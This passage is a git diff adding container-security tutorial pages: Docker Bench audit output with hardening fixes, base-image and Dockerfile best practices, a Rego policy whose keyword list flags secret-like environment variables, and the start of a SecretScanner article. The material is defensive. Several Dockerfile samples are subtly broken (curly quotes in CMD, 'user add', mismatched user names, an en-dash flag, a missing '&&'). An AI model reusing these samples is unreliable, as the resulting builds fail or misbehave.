INCLUDE optional Comma delimited list of patterns within a container or image name to check + -x EXCLUDE optional Comma delimited list of patterns within a container or image name to exclude from check + -n LIMIT optional In JSON output, when reporting lists of items (containers, images, etc.), limit the number of reported items to LIMIT. Default 0 (no limit). + -p PRINT optional Disable the printing of remediation measures. Default: print remediation measures. + +``` + +## Running Docker Bench for poticular docker images + +```bash +sudo ./docker-bench-security.sh -i hello-world +Password: +# -------------------------------------------------------------------------------------------- +# Docker Bench for Security v1.3.6 +# +# Docker, Inc. (c) 2015-2023 +# +# Checks for dozens of common best-practices around deploying Docker containers in production. +# Based on the CIS Docker Benchmark 1.4.0. +# -------------------------------------------------------------------------------------------- + +Initializing 2023-01-04T19:09:21:z + + +Section A - Check results + +[INFO] 1 - Host Configuration +[INFO] 1.1 - Linux Hosts Specific Configuration +[WARN] 1.1.1 - Ensure a separate partition for containers has been created (Automated) +[INFO] 1.1.2 - Ensure only trusted users are allowed to control Docker daemon (Automated) +[INFO] * Users: +[WARN] 1.1.3 - Ensure auditing is configured for the Docker daemon (Automated) +[WARN] 1.1.4 - Ensure auditing is configured for Docker files and directories -/run/containerd (Automated) +[INFO] 1.1.5 - Ensure auditing is configured for Docker files and directories - /var/lib/docker (Automated) +[INFO] * Directory not found +[INFO] 1.1.6 - Ensure auditing is configured for Docker files and directories - /etc/docker (Automated) +[INFO] * Directory not found +[INFO] 1.1.7 - Ensure auditing is configured for Docker files and directories - docker.service (Automated) +[INFO] * File not found +[INFO] 1.1.8 - Ensure auditing is configured for Docker files and directories - containerd.sock (Automated) +[INFO] * File not found +[INFO] 1.1.9 - Ensure auditing is configured for Docker files and directories - docker.socket (Automated) +[INFO] * File not found +[INFO] 1.1.10 - Ensure auditing is configured for Docker files and directories - /etc/default/docker (Automated) +[INFO] * File not found +[INFO] 1.1.11 - Ensure auditing is configured for Dockerfiles and directories - /etc/docker/daemon.json (Automated) +[INFO] * File not found +[INFO] 1.1.12 - 1.1.12 Ensure auditing is configured for Dockerfiles and directories - /etc/containerd/config.toml (Automated) +[INFO] * File not found +[INFO] 1.1.13 - Ensure auditing is configured for Docker files and directories - /etc/sysconfig/docker (Automated) +[INFO] * File not found +[INFO] 1.1.14 - Ensure auditing is configured for Docker files and directories - /usr/bin/containerd (Automated) +[INFO] * File not found +[INFO] 1.1.15 - Ensure auditing is configured for Docker files and directories - /usr/bin/containerd-shim (Automated) +[INFO] * File not found +[INFO] 1.1.16 - Ensure auditing is configured for Docker files and directories - /usr/bin/containerd-shim-runc-v1 (Automated) +[INFO] * File not found +[INFO] 1.1.17 - Ensure auditing is configured for Docker files and directories - /usr/bin/containerd-shim-runc-v2 (Automated) +[INFO] * File not found +[INFO] 1.1.18 - Ensure auditing is configured for Docker files and directories - /usr/bin/runc (Automated) +[INFO] * File not found +[INFO] 1.2 - General Configuration +[NOTE] 1.2.1 - Ensure the container host has been Hardened (Manual) +date: illegal time format +usage: date [-jnRu] [-r seconds|file] [-v[+|-]val[ymwdHMS]] + [-I[date | hours | minutes | seconds]] + [-f fmt date | [[[mm]dd]HH]MM[[cc]yy][.ss]] [+format] +./functions/helper_lib.sh: line 36: [: : integer expression expected +./functions/helper_lib.sh: line 37: [: : integer expression expected +[PASS] 1.2.2 - Ensure that the version of Docker is up to date (Manual) +[INFO] * Using 20.10.21 which is current +[INFO] * Check with your operating system vendor for support and security maintenance for Docker + +[INFO] 2 - Docker daemon configuration +[NOTE] 2.1 - Run the Docker daemon as a non-root user, if possible (Manual) +[WARN] 2.2 - Ensure network traffic is restricted between containers on the default bridge (Scored) +[PASS] 2.3 - Ensure the logging level is set to 'info' (Scored) +[PASS] 2.4 - Ensure Docker is allowed to make changes to iptables (Scored) +[PASS] 2.5 - Ensure insecure registries are not used (Scored) +[PASS] 2.6 - Ensure aufs storage driver is not used (Scored) +[INFO] 2.7 - Ensure TLS authentication for Docker daemon is configured (Scored) +[INFO] * Docker daemon not listening on TCP +[INFO] 2.8 - Ensure the default ulimit is configured appropriately (Manual) +[INFO] * Default ulimit doesn't appear to be set +[WARN] 2.9 - Enable user namespace support (Scored) +[PASS] 2.10 - Ensure the default cgroup usage has been confirmed (Scored) +[PASS] 2.11 - Ensure base device size is not changed until needed (Scored) +[WARN] 2.12 - Ensure that authorization for Docker client commands is enabled (Scored) +[WARN] 2.13 - Ensure centralized and remote logging is configured (Scored) +[WARN] 2.14 - Ensure containers are restricted from acquiring new privileges (Scored) +[WARN] 2.15 - Ensure live restore is enabled (Scored) +[WARN] 2.16 - Ensure Userland Proxy is Disabled (Scored) +[PASS] 2.17 - Ensure that a daemon-wide custom seccomp profile is applied if appropriate (Manual) +[INFO] Ensure that experimental features are not implemented in production (Scored) (Deprecated) + +[INFO] 3 - Docker daemon configuration files +[INFO] 3.1 - Ensure that the docker.service file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.2 - Ensure that docker.service file permissions are appropriately set (Automated) +[INFO] * File not found +[INFO] 3.3 - Ensure that docker.socket file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.4 - Ensure that docker.socket file permissions are set to 644 or more restrictive (Automated) +[INFO] * File not found +[INFO] 3.5 - Ensure that the /etc/docker directory ownership is set to root:root (Automated) +[INFO] * Directory not found +[INFO] 3.6 - Ensure that /etc/docker directory permissions are set to 755 or more restrictively (Automated) +[INFO] * Directory not found +[INFO] 3.7 - Ensure that registry certificate file ownership is set to root:root (Automated) +[INFO] * Directory not found +[INFO] 3.8 - Ensure that registry certificate file permissions are set to 444 or more restrictively (Automated) +[INFO] * Directory not found +[INFO] 3.9 - Ensure that TLS CA certificate file ownership is set to root:root (Automated) +[INFO] * No TLS CA certificate found +[INFO] 3.10 - Ensure that TLS CA certificate file permissions are set to 444 or more restrictively (Automated) +[INFO] * No TLS CA certificate found +[INFO] 3.11 - Ensure that Docker server certificate file ownership is set to root:root (Automated) +[INFO] * No TLS Server certificate found +[INFO] 3.12 - Ensure that the Docker server certificate file permissions are set to 444 or more restrictively (Automated) +[INFO] * No TLS Server certificate found +[INFO] 3.13 - Ensure that the Docker server certificate key file ownership is set to root:root (Automated) +[INFO] * No TLS Key found +[INFO] 3.14 - Ensure that the Docker server certificate key file permissions are set to 400 (Automated) +[INFO] * No TLS Key found +stat: illegal option -- c +usage: stat [-FLnq] [-f format | -l | -r | -s | -x] [-t timefmt] [file ...] +[WARN] 3.15 - Ensure that the Docker socket file ownership is set to root:docker (Automated) +[WARN] * Wrong ownership for /var/run/docker.sock +stat: illegal option -- c +usage: stat [-FLnq] [-f format | -l | -r | -s | -x] [-t timefmt] [file ...] +./tests/3_docker_daemon_configuration_files.sh: line 429: [: : integer expression expected +[WARN] 3.16 - Ensure that the Docker socket file permissions are set to 660 or more restrictively (Automated) +[WARN] * Wrong permissions for /var/run/docker.sock +[INFO] 3.17 - Ensure that the daemon.json file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.18 - Ensure that daemon.json file permissions are set to 644 or more restrictive (Automated) +[INFO] * File not found +[INFO] 3.19 - Ensure that the /etc/default/docker file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.20 - Ensure that the /etc/sysconfig/docker file permissions are set to 644 or more restrictively (Automated) +[INFO] * File not found +[INFO] 3.21 - Ensure that the /etc/sysconfig/docker file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.22 - Ensure that the /etc/default/docker file permissions are set to 644 or more restrictively (Automated) +[INFO] * File not found +[INFO] 3.23 - Ensure that the Containerd socket file ownership is set to root:root (Automated) +[INFO] * File not found +[INFO] 3.24 - Ensure that the Containerd socket file permissions are set to 660 or more restrictively (Automated) +[INFO] * File not found +[INFO] 4 - Container Images and Build File +[INFO] 4.1 - Ensure that a user for the container has been created (Automated) +[INFO] * No containers running +[NOTE] 4.2 - Ensure that containers use only trusted base images (Manual) +[NOTE] 4.3 - Ensure that unnecessary packages are not installed in the container (Manual) +[NOTE] 4.4 - Ensure images are scanned and rebuilt to include security patches (Manual) +[WARN] 4.5 - Ensure Content trust for Docker is Enabled (Automated) +[PASS] 4.6 - Ensure that HEALTHCHECK instructions have been added to container images (Automated) +[PASS] 4.7 - Ensure update instructions are not used alone in the Dockerfile (Manual) +[NOTE] 4.8 - Ensure setuid and setgid permissions are removed (Manual) +[PASS] 4.9 - Ensure that COPY is used instead of ADD in Dockerfiles (Manual) +[NOTE] 4.10 - Ensure secrets are not stored in Dockerfiles (Manual) +[NOTE] 4.11 - Ensure only verified packages are installed (Manual) +[NOTE] 4.12 - Ensure all signed artifacts are validated (Manual) +[INFO] 5 - Container Runtime +[INFO] * No containers running, skipping Section 5 +[INFO] 6 - Docker Security Operations +[INFO] 6.1 - Ensure that image sprawl is avoided (Manual) +[INFO] * There are currently: 13 images +[INFO] * Only 0 out of 13 are in use +[INFO] 6.2 - Ensure that container sprawl is avoided (Manual) +[INFO] * There are currently a total of 40 containers, with 18 of them currently running +[INFO] 7 - Docker Swarm Configuration +[PASS] 7.1 - Ensure swarm mode is not Enabled, if not needed (Automated) +[PASS] 7.2 - Ensure that the minimum number of manager nodes have been created in a swarm (Automated) (Swarm mode not enabled) +[PASS] 7.3 - Ensure that swarm services are bound to a specific host interface (Automated) (Swarm mode not enabled) +[PASS] 7.4 - Ensure that all Docker swarm overlay networks are encrypted (Automated) +[PASS] 7.5 - Ensure that Docker's secret management commands are used for managing secrets in a swarm cluster (Manual) (Swarm mode not enabled) +[PASS] 7.6 - Ensure that swarm manager is run in auto-lock mode (Automated) (Swarm mode not enabled) +[PASS] 7.7 - Ensure that the swarm manager auto-lock key is rotated periodically (Manual) (Swarm mode not enabled) +[PASS] 7.8 - Ensure that node certificates are rotated as appropriate (Manual) (Swarm mode not enabled) +[PASS] 7.9 - Ensure that CA certificates are rotated as appropriate (Manual) (Swarm mode not enabled) +[PASS] 7.10 - Ensure that management plane traffic is separated from data plane traffic (Manual) (Swarm mode not enabled) + + +Section C - Score +[INFO] Checks: 86 +[INFO] Score: -1 + + +``` + +# Run the Docker daemon as a non-root user, if possible (Manual) + +The Docker containers by default run with the root privilege and so does the application that runs inside the container. This is another major concern from the security perspective because hackers can gain root access to the Docker host by hacking the application running inside the container. + + +Add user to Docker group + +```bash +$ sudo groupadd docker +``` +add your user to the docker group: + +```bash +sudo usermod -aG docker [non-root user] + +``` + +Using Dockerfile (USER instruction) + +dit the Dockerfile that creates a non-root privilege user and modify the default root user to the newly-created non-root privilege user, as shown here: + + +```bash +########################################## +# Dockerfile to change from root to +# non-root privilege +########################################### +# Base image is CentOS 7 +FROM Centos:7 +# Add a new user "sangam" with user id 8877 +RUN useradd -u 8877 sangam +# Change to non-root privilege +USER sangam + +``` + +Proceed to build the Docker image using the β€œdocker build” subcommand, as depicted here: + +```bash +sudo docker build -t nonrootimage . + +``` + Finally, let’s verify the current user of our container using the id command in a docker run subcommand: + +```bash +sudo docker run --rm nonrootimage id +``` + +# Ensure network traffic is restricted between containers on the default bridge + +```bash +sudo docker network ls +Password: +NETWORK ID NAME DRIVER SCOPE +beb64c03a4cf bridge bridge local +1d337b15d114 host host local +88ea4badd709 meshery_docker-extension-meshery-desktop-extension_default bridge local +3be4c0abf1a8 minikube bridge local +47444c7b3650 multinode-pod-security bridge local +ed5ab538e49a none null local +``` + +```bash +sudo docker network inspect bridge + +Password: +[ + { + "Name": "bridge", + "Id": "beb64c03a4cf6c3385fd311edf8a3ff76670f62045068bad43ad4fcfe40f5c72", + "Created": "2023-01-04T11:46:52.643189959Z", + "Scope": "local", + "Driver": "bridge", + "EnableIPv6": false, + "IPAM": { + "Driver": "default", + "Options": null, + "Config": [ + { + "Subnet": "172.17.0.0/16", + "Gateway": "172.17.0.1" + } + ] + }, + "Internal": false, + "Attachable": false, + "Ingress": false, + "ConfigFrom": { + "Network": "" + }, + "ConfigOnly": false, + "Containers": {}, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + }, + "Labels": {} + } +] + + +``` +If not required, you should restrict the network traffic between containers. + +By default, unrestricted network traffic is enabled amongst all containers on the same host in the default network bridge. However, a bad actor positioned in a compromised container could leverage this functionality to abuse other services exposed by other containers within the container network on the same host. + +To disable the inter-container communication, configure the daemon with the icc flag set to false. Note that this configuration can be overridden by containers that are run with the deprecated --link option. + + +```bash +$ docker network ls -q | xargs docker network inspect -f '{{ .Name }}: {{ .Options }}' +``` +The com.docker.network.bridge.enable_icc should be set to false for the default network bridge. + +You should also consider using user-defined bridge networks to enforce network isolation among containers as a more flexible solution. + +# Protect the UNIX socket from unintended access + + + +The non-networked /var/run/docker.sock UNIX socket is used by default to locally access the Docker Engine API. The safe default settings on Linux include a socket file owned by the β€œroot” user and a β€œdocker” group allowing solely β€œroot” read and write file permission (ug+rw). + +Run this command to review the correctness of the Docker UNIX socket permissions. + +```bash +$ ls -l /var/run/docker.sock +lrwxr-xr-x 1 root daemon 44 4 Jan 17:16 /var/run/docker.sock -> /Users/sangambiradar/.docker/run/docker.sock +``` + +# Use secure registries to pull and push images + +nsecure registries do not use TLS, nor do they have an invalid TLS certificate. Such registries should not be used as they are prone to man-in-the-middle (MITM) attacks by malicious actors who are able to modify the network traffic. + +Run the below command to list the insecure registries used by the Docker daemon. + +```bash + +docker info --format '{{.RegistryConfig.InsecureRegistryCIDRs}}' + +``` + +# Enable user namespace support +```bash +ps aux | grep dockerd +sangambiradar 34266 0.0 0.0 408626880 1280 s000 S+ 7:22PM 0:00.00 grep --color=auto --exclude-dir=.bzr --exclude-dir=CVS --exclude-dir=.git --exclude-dir=.hg --exclude-dir=.svn --exclude-dir=.idea --exclude-dir=.tox dockerd +``` + +```bash +docker container run -it --rm alpine /bin/sh +Unable to find image 'alpine:latest' locally +latest: Pulling from library/alpine +261da4162673: Pull complete +Digest: sha256:8914eb54f968791faf6a8638949e480fef81e697984fba772b3976835194c6d4 +Status: Downloaded newer image for alpine:latest +/ # whoami +root +``` + +To follow the principle of least privilege, containerized applications should not be run as root. To achieve this, then the --user parameter can be used to specify a user other than root for the container. It accepts as value a username (if it was previously created in the Dockerfile) or a UID, optionally a GID as well. + +## Enable Content Trust +Ensure Content trust for Docker is Enabled. Content trust is a system for signing Docker images and verifying their signatures before running them. We can enable content trust with the `DOCKER_CONTENT_TRUST` environment variable. + +To set this variable for your current shell +session, type the following into the shell: + +```bash +export DOCKER_CONTENT_TRUST=1 + +``` + + +Running the audit after this export command should show that Content trust has been enabled and clear this warning. To enable it automatically for all users and all sessions, add the `DOCKER_CONTENT_TRUST` variable to the `/etc/environment` file, which is a file for assigning system-wide environment variables: + +```bash +echo "DOCKER_CONTENT_TRUST=1" | sudo tee -a /etc/environment + +``` + +## Ensure auditing is configured for various Docker files + +```bash +sudo apt-get install auditd +``` + +```bash +sudo nano /etc/audit/audit.rules +ubuntu@enormous-longspur:~$ sudo cat /etc/audit/audit.rules +## This file is automatically generated from /etc/audit/rules.d +-D +-b 8192 +-f 1 +--backlog_wait_time 60000 + +-w /usr/bin/docker -p wa +-w /var/lib/docker -p wa +-w /etc/docker -p wa +-w /lib/systemd/system/docker.service -p wa +-w /lib/systemd/system/docker.socket -p wa +-w /etc/default/docker -p wa +-w /etc/docker/daemon.json -p wa +-w /usr/bin/docker-containerd -p wa +-w /usr/bin/docker-runc -p wa + +``` + +Restart auditd for the changes to take effect: + +```bash +sudo systemctl restart auditd +``` + +## Correcting Docker Daemon Configuration Warnings + +```bash +sudo nano /etc/docker/daemon.json +ubuntu@docker:~/docker-bench-security$ cat nano /etc/docker/daemon.json +cat: nano: No such file or directory + +{ + "icc": false, + "userns-remap": "default", + "log-driver": "syslog", + "disable-legacy-registry": true, + "live-restore": true, + "userland-proxy": false, + "no-new-privileges": true +} +ubuntu@docker:~/docker-bench-security$ + +sudo systemctl restart docker + +``` + +## Enable Content Trust + +Content trust is a system for signing Docker images and verifying their signatures before running them. We can enable content trust with the DOCKER_CONTENT_TRUST environment variable. + +```bash +export DOCKER_CONTENT_TRUST=1 + +``` + +Running the audit after this export command should show that Content trust has been enabled and clear this warning. To enable it automatically for all users and all sessions, add the DOCKER_CONTENT_TRUST variable to the /etc/environment file, which is a file for assigning system-wide environment variables: + +```bash +echo "DOCKER_CONTENT_TRUST=1" | sudo tee -a /etc/environment + +``` \ No newline at end of file diff --git a/content/en/containersecurity/b14.Container-image-security 2.md b/content/en/containersecurity/b14.Container-image-security 2.md new file mode 100644 index 0000000..97f1fdc --- /dev/null +++ b/content/en/containersecurity/b14.Container-image-security 2.md @@ -0,0 +1,265 @@ +--- +title: "Container Image Security " +description: "Container Image Security " +slug: "container-image-security" +--- + +## Container Image Security + + - Building secure container images + +## Choosing base images + + # Alpine +- Pros + - very small images: the community pays a lot attention on minimizing image sizes + - minimum functionality: only absolutely necessary packages contained + - lightweight init system: like Gentoo, Alpine uses OpenRC, a lightweight alternative to systemd + - musl performance: for some cases, [musl libc](https://musl.libc.org) can be more performant than [glibc](https://www.gnu.org/software/libc/) +- Cons + - rather Poor Documentation + - Small team : Currently there are [3 developer listed ](https://wiki.alpinelinux.org/wiki/Alpine_Linux:Developers + ) as the alpine linux team + - possible incompatibilities: musl libc may cause problems with some C-based plugins and adjustments may be necessary if you compile software yourself + +# Debian + +- Pro: + - small images: the size of slimmed down Debian images (such as minideb by Bitnami) is almost on par with Alpine (e.g. m[minideb](https://github.com/bitnami/minideb) + Python is [just 7 MB larger than Alpine + Python](https://dzone.com/articles/minideb-a-minimalist-debian-based-docker-image)) + - lots of packages: there's hardly any software for Linux which hasn't been packaged for Debian + - well tested: due to its popularity, Debian is used widely and issues are more likely to be found + - comprehensive documentation; also, the community produced a big amount of additional documentations and tutorials + - more security reviews: again, due to its larger community, Debian gets more attention and its more likely that vulnerabilities are discovered, e.g in glibc versus in musl libc (assumption). Debian also has a [security audit team](https://www.debian.org/security/), which proactively looks for security issues. + - provenance: validating authenticity of packages is possible, e.g. with debsigs / dpkgsig + +- Con: + + - slightly larger attack surface: minideb consists of about 35 packages (such as bash, grep, hostname, mount …) due to apt depending on it + - more false positives: scanners may report more false positives you need to look at + +# Distroless images + +simple distroless Golang Example + +```go +package main + +import "fmt" + +func main() { + fmt.Println("Hello, world!") +} + +``` + +```Dockerfile +FROM golang:1.18 as build +WORKDIR /go/src/app +COPY . . +RUN go mod download +RUN go vet -v +RUN go test -v +RUN CGO_ENABLED=0 go build -o /go/bin/app +FROM gcr.io/distroless/static-debian11 +COPY --from=build /go/bin/app / +CMD ["/app"] +``` + + +- Distroless 2.0 project - uses Alpine as a minimalistic & secure base image, and with the help of two tools, apko and melange, allows to build an application-tailored image containing only (mostly?) the necessary bits. + + +- What is apko ? + - Declarative OCI image builder tool based on apk + - Images are defined in YAML files + - Build are fully reproducible + - Automatically generates SBOMs for every imahes + - Platform-agnostic buids via Docker + apko images + + + - example of apko.yaml file + +```yaml +contents: + repositories: + - https://dl-cdn.alpinelinux.org/alpine/edge/main + packages: + - alpine-base +entrypoint: + command: /bin/sh -l +# optional environment configuration +environment: + PATH: /usr/sbin:/sbin:/usr/bin:/bin + +``` + +Buiding the images with apko via Docker + +```bash +docker run -v "$PWD":/work cgr.dev/chainguard/apko build examples/alpine-base.yaml apko-alpine:edge apko-alpine.tar +``` + +test the image with docker + +```bash +$ docker load < alpine.tar +$ docker run -it apko-alpine:test +``` + +- Why apko ? + - Introduced by alphine , it used a different methodology to handle package management + - Package Installation or removal is done as a side effect of modifyinh the system state + - This creates the ideal conditions for reproducible and declaratve pipelines + +- where do package come from ? + - for alphine-base images , use Alphine apks found at pkgs.alpinelinux.org/packages + - for wolfi images , use wolfi apks that are listed in the wolfi-os repository hosted at packages.wolfi.dev/os + - Don't mix! + - You cam also create your own apks with melange + +- why distroless ? + - Minimalist container images with only what's absolutely necessary to build or execute your application + - Popular base images are full of software that only makes sense on bare metal + - No need for package managers or interactive shells on production images + - less dependencies = less attack surface + + +```bash +docker run cgr.dev/chainguard/apko version +``` + +```bash +docker run -v "$PWD":/work cgr.dev/chainguard/apko build examples/alpine-base.yaml apko-alpine:edge apko-alpine.tar + +``` + + + +# Scratch Images + +The default golang image is great! It allows you to quickly build and test your golang projects. But it has a few draw backs, it is a massive 964 MB even the slimmed down alpine based image is 327 MB, not only that but having unused binaries and packages opens you up to security flaws. + +Using a multi-stage image will allow you to build smaller images by dropping all the packages used to build the binaries and only including the ones required during runtime. + +```dockerfile +# Create a builder stage +FROM golang:alpine as builder + +RUN apk update +RUN apk add --no-cache git ca-certificates \ + && update-ca-certificates + +COPY . . + +# Fetch dependencies +RUN go mod download +RUN go mod verify + +# Build the binary +RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 \ + go build -ldflags="-w -s" \ + -o /go/bin/my-docker-binary + +# Create clean image +FROM alpine:latest + +# Copy only the static binary +COPY --from=builder /go/bin/my-docker-binary \ + /go/bin/my-docker-binary + +# Run the binary +ENTRYPOINT ["/go/bin/my-docker-binary"] + +``` +Great now we have an image thats 20 MB thats a 95% reduction! Remember these are production images so we use -ldflags="-w -s" to turn off debug information -w and Go symbols -s. + + +## Scratch Image and Lowest Privilege User + +Now to get rid of all those unused packages. Instead of using the alpine image as our final stage we will use the scratch image which has literally nothing! + +Will will take this opportunity to also create a non-root user. Add the following snippet to your builder stage + +``` + +ENV USER=appuser +ENV UID=10001 + +RUN adduser \ + --disabled-password \ + --gecos "" \ + --home "/nonexistent" \ + --shell "/sbin/nologin" \ + --no-create-home \ + --uid "$\{UID\}" \ + "$\{USER\}" + +``` + +We will need to copy over the ca-certificates to the final stage, this is only required if you are making https calls and we will also need to copy over the passwd and group files to use our appuser. Finally we need get the stage to use our user. + +``` +# Copy over the necessary files +COPY --from=builder \ + /etc/ssl/certs/ca-certificates.crt \ + /etc/ssl/certs/ +COPY --from=builder /etc/passwd /etc/passwd +COPY --from=builder /etc/group /etc/group +# Use our user! +USER appuser:appuser +``` + +So finally your Dockerfile should look something like this: + + +``` +# Create a builder stage +FROM golang:alpine as builder + +RUN apk update +RUN apk add --no-cache git ca-certificates \ + && update-ca-certificates + +ENV USER=appuser +ENV UID=10001 + +RUN adduser \ + --disabled-password \ + --gecos "" \ + --home "/nonexistent" \ + --shell "/sbin/nologin" \ + --no-create-home \ + --uid "${UID}" \ + "${USER}" + +COPY . . + +# Fetch dependencies +RUN go mod download +RUN go mod verify + +# Build the binary +RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 \ + go build -ldflags="-w -s" \ + -o /go/bin/my-docker-binary + +# Create clean image +FROM scratch + +# Copy only the static binary +COPY --from=builder \ + /go/bin/my-docker-binary \ + /go/bin/my-docker-binary +COPY --from=builder \ + /etc/ssl/certs/ca-certificates.crt \ + /etc/ssl/certs/ +COPY --from=builder /etc/passwd /etc/passwd +COPY --from=builder /etc/group /etc/group + +# Use our user! +USER appuser:appuser + +# Run the binary +ENTRYPOINT ["/go/bin/my-docker-binary"] + +``` \ No newline at end of file diff --git a/content/en/containersecurity/b15.dockerfile-security 2.md b/content/en/containersecurity/b15.dockerfile-security 2.md new file mode 100644 index 0000000..d6421f0 --- /dev/null +++ b/content/en/containersecurity/b15.dockerfile-security 2.md @@ -0,0 +1,267 @@ +--- +title: "DockerFile Security Best Practices " +slug: "DockerFile-Security-Best-Practices" +--- + + +# DockerFile Security Best Practices + +- Choose Minimal Base Images + +![](./images/minimal.gif) + +```Dockerfile +FROM alpine +WORKDIR /app +COPY package.json /app +RUN npm install +CMD [β€œnode”,β€œindex.js”] + +``` + + +- Remove Cache Packages +![](./images/cache-package.jpeg) + +```Dockerfile +FROM alpine +RUN apk add nginx && rm -rf /var/cache/apt/* +COPY index.html /var/www/html/ +EXPOSE 80 +CMD [β€œnginx”,β€œ-g”,β€œdaemon off;”] +``` + +```Dockerfile +FROM alpine +RUN apk add –no-cache nginx +COPY index.html /var/www/html/ +EXPOSE 80 +CMD [β€œnginx”,β€œ-g”,β€œdaemon off;”] +``` + +- avoid multilayers + +![](https://miro.medium.com/max/1000/0*FMAsrFS11TCJaQl5.gif) + +```Dockerfile +FROM alpine +RUN apk update +RUN apk add curl +RUN apk add nodejs +RUN apk add nginx-1.16.1-r6 +RUN apk add nginx-mod-http-geoip2-1.16.1-r6 +COPY index.html /var/www/html/ +EXPOSE 80 +CMD [β€œnginx”,β€œ-g”,β€œdaemon off;”] +``` + +```Dockerfile +FROM alpine +RUN apk update && apk add curl nginx nginx-mod-http-geoip2-1.16.1-r6 \ +rm -rf /var/cache/apt/* +COPY index.html /var/www/html/ +EXPOSE 80 +CMD [β€œnginx”,β€œ-g”,β€œdaemon off;”] + +``` +- Don't ignore `.dockerignore` + +![](https://miro.medium.com/max/800/0*FNJQYGBJTCJ6CwwI.gif) + +``` +node_modules +.env +secrets/ +*pem +*.md +``` + +```Dockerfile +FROM node:10 +WORKDIR /nodeapp +COPY package.json ./ +RUN npm install +COPY . . +EXPOSE 8888 +CMD [ β€œnode”, β€œindex.js” ] +``` + +- choose slim variant + + +![](https://s3.amazonaws.com/media-p.slid.es/uploads/1936196/images/8841214/pasted-from-clipboard.png) + +- cut the root + +![](https://s3.amazonaws.com/media-p.slid.es/uploads/1936196/images/8841215/pasted-from-clipboard.png) + +```Dockerfile +FROM node:10 +WORKDIR /app +COPY package.json ./ +RUN npm install +COPY . . +EXPOSE 8888 +CMD [ β€œnode”, β€œindex.js” ] +``` + +```Dockerfile +FROM node:10 +RUN user add -m nodeapp +USER nodeappuser +RUN whoami +WORKDIR /app +COPY package.json ./ +RUN npm install +COPY . . +EXPOSE 8888 +CMD [ β€œnode”, β€œindex.js” ] + +``` + +## Remove Unwanted + +![](https://miro.medium.com/max/1060/0*5Kgip-LsvTRHXb7f.gif) + + +TAG Wisely + + + +![](https://miro.medium.com/max/960/0*XchFJrkVCTwcC1Aj.gif) + +So No to latest Tags + +![](https://s3.amazonaws.com/media-p.slid.es/uploads/1936196/images/8841223/pasted-from-clipboard.png) + +Public Private Registry + +![](https://miro.medium.com/max/960/0*cWv3QB9YHc_5a3D_.gif) + +keep it single +![](https://miro.medium.com/max/700/0*RJiU_CQIcwj5t-6I.gif) + +## Avoid Hard Coding + +![](https://miro.medium.com/max/1000/0*cg2kGD2eKdypyJzT.gif) + +``` +ARG VERSION +FROM node:$VERSION +WORKDIR /app +COPY package.json ./ +RUN npm install +COPY . . +EXPOSE 8888 +CMD [ β€œnode”, β€œindex.js” ] + +``` + +``` +docker build -t testimage –build-arg VERSION=10 . +docker build -t testimage –build-arg VERSION=9 . +``` + +adding metadata + +![](https://miro.medium.com/max/1374/0*Pz7-FhTCNRu7Qs9B.jpg) + +``` +FROM node:10 +LABEL version=β€œ1.0” maintainer=β€œSangam Biradar ” +WORKDIR /app +COPY package.json ./ +RUN npm install +COPY . . +EXPOSE 8888 +CMD [ β€œnode”, β€œindex.js” ] + +``` + +Rego Policies + +- write custom policies + +```json + +package play + + +suspicious_env_keys = [ + "passwd", + "password", + "secret", + "key", + "access", + "api_key", + "apikey", + "token", +] + +pkg_update_commands = [ + "apk upgrade", + "apt-get upgrade", + "dist-upgrade", +] + +image_tag_list = [ + "latest", + "LATEST", +] + +# Looking for suspicious environemnt variables +deny[msg] { + input[i].Cmd == "env" + val := input[i].Value + contains(lower(val[_]), suspicious_env_keys[_]) + msg = sprintf("Suspicious ENV key found: %s", [val]) +} + +# Looking for latest docker image used +warn[msg] { + input[i].Cmd == "from" + val := split(input[i].Value[0], ":") + count(val) == 1 + msg = sprintf("Do not use latest tag with image: %s", [val]) +} + +# Looking for latest docker image used +warn[msg] { + input[i].Cmd == "from" + val := split(input[i].Value[0], ":") + contains(val[1], image_tag_list[_]) + msg = sprintf("Do not use latest tag with image: %s", [input[i].Value]) +} + +# Looking for apk upgrade command used in Dockerfile +deny[msg] { + input[i].Cmd == "run" + val := concat(" ", input[i].Value) + contains(val, pkg_update_commands[_]) + msg = sprintf("Do not use upgrade commands: %s", [val]) +} + +# Looking for ADD command instead using COPY command +deny[msg] { + input[i].Cmd == "add" + val := concat(" ", input[i].Value) + msg = sprintf("Use COPY instead of ADD: %s", [val]) +} + +# sudo usage +deny[msg] { + input[i].Cmd == "run" + val := concat(" ", input[i].Value) + contains(lower(val), "sudo") + msg = sprintf("Avoid using 'sudo' command: %s", [val]) +} + +# # No Healthcheck usage +# deny[msg] { +# input[i].Cmd == "healthcheck" +# msg := "no healthcheck" +# } + +``` +[Rego Playground](https://play.openpolicyagent.org/p/epcbtaBtSF) + diff --git a/content/en/containersecurity/b16.SecretScanner 2.md b/content/en/containersecurity/b16.SecretScanner 2.md new file mode 100644 index 0000000..f8dc508 --- /dev/null +++ b/content/en/containersecurity/b16.SecretScanner 2.md @@ -0,0 +1,354 @@ +--- +title: "SecretScanner - Finding secrets and passwords in container images and file systems " +slug: "SecretScanner-Finding-secrets-and-passwords-in-container-images-and-file-systems" +--- + +Published on [CloudNativeFolks](https://blog.cloudnativefolks.org/finding-leaked-secrets-in-your-container-images-and-file-system-with-secretscanner) + +One of most common mistake is leaking Secrets via docker images or file system in this blogpost we will use [Deepfence's](https://deepfence.io) Open Source Project [SecretScanner](https://github.com/deepfence/SecretScanner) + +few days back I found this interesting tweet discussion from cybersecurity community members ! + + + +here you see article around Uber security incidence + +%[https://www.uber.com/newsroom/security-update/] + +lets understand why secret scanner help you securing your container images and file system + +If you see DockerHub most of images and public and thousands of secrets leaked over the year + +If you see of of example from past supply chain attack one of docker image Codecov contain git credentials that allow attacker to gain access to price Codecov's private git repositories and committed backdoors by attacker to there product and later that effected to 22000 Codecov's users + +## lets write `insecure.DockerFile` 